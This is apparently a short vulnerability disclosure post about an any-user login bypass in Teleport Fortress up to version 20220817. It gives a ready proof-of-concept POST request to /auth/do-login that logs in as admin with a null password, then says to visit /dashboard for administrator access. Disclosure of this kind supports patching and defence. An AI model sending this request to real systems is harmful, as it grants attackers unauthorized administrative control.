Teleport Fortress Do Login Any User Login Vulnerability
Teleport Fortress Do Login Any User Login Vulnerability
Teleport Fortress do-login Any user login vulnerability
Vulnerability Description
Teleport Fortress has a login vulnerability for any user. The attacker can log in to the Fortress to obtain other system permissions by constructing a special request package.
Vulnerability Impact
Teleport Version <= 20220817
Network surveying and mapping
Vulnerability reappears
Login page
Verify POC, captcha parameter is the verification code
1
2
3
POST /auth/do-login
args={"type":2,"username":"admin","password":null,"captcha":"ykex","oath":"","remember":false}
Returning code 0 means success, and then access /dashboard to obtain administrator permissions
This post is licensed under CC BY 4.0 by the author.